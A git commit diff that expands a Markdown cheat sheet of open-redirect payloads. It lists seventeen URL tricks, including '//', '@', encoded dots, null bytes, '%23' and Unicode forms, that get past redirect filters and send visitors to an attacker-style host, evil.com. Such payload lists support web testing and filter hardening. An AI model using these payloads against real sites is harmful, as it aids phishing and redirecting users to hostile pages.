Adding a lot open redirect tips

2021-04-29 04:41:34 +07:00 · 2021-04-29 04:41:34 +07:00 · db67aa4646
parent 5428e25125
commit db67aa4646
1 changed files with 48 additions and 24 deletions
--- a/Redirect.md
+++ b/Redirect.md
@ -1,66 +1,90 @@
-## Filter Bypass
+## Open Redirect

-1. Using a whitelisted domain or keyword
+1. Try change the domain
 ```
-target.com.evil.com
+/?redir=evil.com
 ```

-2. Using "//" to bypass "http" blacklisted keyword
+2. Using a whitelisted domain or keyword
 ```
-//evil.com
+/?redir=target.com.evil.com
 ```

-3. Using "https:" to bypass "//" blacklisted keyword
+3. Using `//` to bypass `http` blacklisted keyword
 ```
-https:evil.com
+/?redir=//evil.com
 ```

-4. Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
+4. Using `https:` to bypass `//` blacklisted keyword
 ```
-\/\/evil.com/
-/\/evil.com/
+/?redir=https:evil.com
 ```

-5. Using "%E3%80%82" to bypass "." blacklisted character
+5. Using `\\` to bypass `//` blacklisted keyword
+```
+/?redir=\\evil.com
+```
+
+6. Using `\/\/` to bypass `//` blacklisted keyword
+```
+/?redir=\/\/evil.com/
+/?redir=/\/evil.com/
+```
+
+7. Using `%E3%80%82` to bypass `.` blacklisted character
 ```
 /?redir=evil。com
 /?redir=evil%E3%80%82com
 ```

-6. Using null byte "%00" to bypass blacklist filter
+8. Using null byte `%00` to bypass blacklist filter
 ```
-//evil%00.com
+/?redir=//evil%00.com
 ```

-7. Using parameter pollution
+9. Using parameter pollution
 ```
-?next=target.com&next=evil.com
+/?next=target.com&next=evil.com
 ```

-8. Using "@" character, browser will redirect to anything after the "@"
+10. Using `@` or `%40` character, browser will redirect to anything after the `@`
 ```
-target.com@evil.com
-target.com%40evil.com
+/?redir=target.com@evil.com
+/?redir=target.com%40evil.com
 ```

-9. Creating folder as their domain
+11. Creating folder as their domain
 ```
 http://www.yoursite.com/http://www.theirsite.com/
 http://www.yoursite.com/folder/www.folder.com
 ```

-10.  Using "?" characted, browser will translate it to "/?"
+12.  Using `?` characted, browser will translate it to `/?`
 ```
-http://www.yoursite.com?http://www.theirsite.com/
-http://www.yoursite.com?folder/www.folder.com
+/?redir=target.com?evil.com
 ```

-11. Host/Split Unicode Normalization
+13. Bypass the filter if it only checks for domain name using `%23`
+```
+/?redir=target.com%23evil.com
+```
+
+14.  Host/Split Unicode Normalization
 ```
 https://evil.c℀.example.com
 ```

-12. Using parsing
+15. Using parsing
 ```
 http://ⓔⓥⓘⓛ.ⓒⓞⓜ
+```
+
+16. Using `°` symbol to bypass
+```
+/?redir=target.com/°evil.com
+```
+
+17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`
+```
+/?redir=/%0d/evil.com
 ```